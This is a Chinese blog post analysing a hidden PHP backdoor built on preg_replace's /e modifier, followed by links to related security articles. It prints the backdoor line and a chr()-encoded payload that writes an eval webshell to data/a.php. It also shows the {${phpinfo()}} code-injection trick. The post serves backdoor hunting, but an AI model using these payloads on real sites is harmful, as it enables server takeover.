記一次發(fā)現(xiàn)利用preg_replace隱藏后門和后續(xù)探究

事情是這樣的,朋友的網(wǎng)站的利用各種查找后門的工具都沒有發(fā)現(xiàn)php木馬。老是找不到,小黑的伎倆很高級,每次使用完畢總是把后門刪掉,但是每次都能繼續(xù)進(jìn)來,總是找不到從哪進(jìn)來的。這個(gè)著實(shí)讓人蛋疼。
后來,終于在日志中發(fā)現(xiàn)一絲蛛絲馬跡,通過我的分析,我發(fā)現(xiàn)一個(gè)IP總是很奇怪的POST數(shù)據(jù)到某個(gè)文件。然后一段時(shí)間后,此IP就訪問一個(gè)莫名奇妙文件,名字很顯眼明顯不是正常系統(tǒng)文件,而是PHP后門。但是很快使用完畢后門就被刪除了。
哈哈,遇到小黑蠻細(xì)心的。
然后通過分析發(fā)現(xiàn),小黑的訪問的文件發(fā)現(xiàn)代碼:
@preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);
如果你看到這個(gè)代碼是不是有的也沒什么問題,但是,這個(gè)就是小黑的掩藏的惡意代碼和后門。隱蔽吧,基本上任何查殺軟件都查殺不到。
preg_replace函數(shù)原型:
mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
特別說明:
/e 修正符使 preg_replace() 將 replacement 參數(shù)當(dāng)作 PHP 代碼(在適當(dāng)?shù)哪嫦蛞锰鎿Q完之后)。提示:要確保 replacement 構(gòu)成一個(gè)合法的 PHP 代碼字符串,否則 PHP 會在報(bào)告在包含 preg_replace() 的行中出現(xiàn)語法解析錯(cuò)誤。
上面的代碼是POST接受數(shù)據(jù)要測試,比較麻煩,如果換成GET獲取數(shù)據(jù)的話。。。
舉例:
echo preg_replace(“/test/e”,$_GET["h"],”jutst test”);
如果我們提交?h=phpinfo(),phpinfo()將會被執(zhí)行(使用/e修飾符,preg_replace會將 replacement 參數(shù)當(dāng)作 PHP 代碼執(zhí)行)。
如果我們要POST的話,我們測試提交下面的代碼會怎么樣呢?
h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
密文對應(yīng)的明文是:
fputs(fopen(data/a.php,w),);
執(zhí)行的結(jié)果是在/data/目錄下生成一個(gè)一句話木馬文件 a.php。
這個(gè)就恐怖了吧。。。。
再來一個(gè)有難度的例子:
<?
function test($str)
{
}
echo preg_replace(“/s*[php](.+?)[/php]s*/ies”, ‘test(“\1″)’, $_GET["h"]);
?>
提交 ?h=phpinfo() ,phpinfo()會被執(zhí)行嗎?
肯定不會。因?yàn)榻?jīng)過正則匹配后, replacement 參數(shù)變?yōu)?rsquo;test(“phpinfo”)’,此時(shí)phpinfo僅是被當(dāng)做一個(gè)字符串參數(shù)了。
有沒有辦法讓它執(zhí)行呢?
當(dāng)然有。在這里我們?nèi)绻峤?h={${phpinfo()}},phpinfo()就會被執(zhí)行。為什么呢?
在php中,雙引號里面如果包含有變量,php解釋器會將其替換為變量解釋后的結(jié)果;單引號中的變量不會被處理。
注意:雙引號中的函數(shù)不會被執(zhí)行和替換。
在這里我們需要通過{${}}構(gòu)造出了一個(gè)特殊的變量,’test(“{${phpinfo()}}”)’,達(dá)到讓函數(shù)被執(zhí)行的效果(${phpinfo()}會被解釋執(zhí)行)。
可以先做如下測試:
echo “{${phpinfo()}}”; phpinfo會被成功執(zhí)行了。
所以,各位查找后門的時(shí)候注意查找下。
OK,說了那么多,也了解了,以上我給的代碼:
@preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);
看似很正常的代碼,其實(shí)就是一個(gè)極度危險(xiǎn)的代碼,隱藏頗深啊。哈哈。希望對大家有幫助
作者:合肥制造
相關(guān)文章
- 最近看到網(wǎng)上曝出的dedecms最新版本的一個(gè)注入漏洞利用,漏洞PoC和分析文章也已在網(wǎng)上公開.但是在我實(shí)際測試過程當(dāng)中,發(fā)現(xiàn)無法復(fù)現(xiàn)2013-06-11
web后門 那些強(qiáng)悍的PHP一句話后門大全分享
我們以一個(gè)學(xué)習(xí)的心態(tài)來對待這些PHP后門程序,很多PHP后門代碼讓我們看到程序員們是多么的用心良苦2013-06-19- 其實(shí)Mysql不只可以用insert into xxx values 插入數(shù)據(jù),還可以:insert into xxx set xx =方法2014-05-07
- 這篇文章主要介紹了防范 dedecms 廣告內(nèi)容插入后門,需要的朋友可以參考下2014-06-27
Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法
這篇文章主要為大家介紹了Linux系統(tǒng)采用netstat命令查看DDOS攻擊的方法,對于網(wǎng)絡(luò)安全而言非常重要!需要的朋友可以參考下2014-07-05各種網(wǎng)頁掛馬方式原理揭密(iframe掛馬,script 掛馬,圖片偽裝掛馬等)
現(xiàn)在,網(wǎng)站經(jīng)常被各種網(wǎng)頁掛馬,為了保障大家網(wǎng)站的安全和互聯(lián)網(wǎng)用戶的安全,有必要對網(wǎng)頁掛馬有所了解。查了一些資料,由于存在大量的黑客軟件,一個(gè)菜鳥只需幾分鐘就可以2016-05-07- SQL注入是從正常的WWW端口訪問,而且表面看起來跟一般的Web頁面訪問沒什么區(qū)別,所以目前市面的防火墻都不會對SQL注入發(fā)出警報(bào),如果管理員沒查看IIS日志的習(xí)慣,可能被入2016-05-21
劫持流量原理是什么?關(guān)于劫持流量的種類和產(chǎn)生
流量圈的故事很多,劫持與反劫持的故事在很長時(shí)間內(nèi)將繼續(xù)演繹下去。流量是很多互聯(lián)網(wǎng)企業(yè)賴以生存的基礎(chǔ),通過優(yōu)秀的產(chǎn)品去獲得用戶和流量是唯一的正途,用戶的信任來之不2016-05-25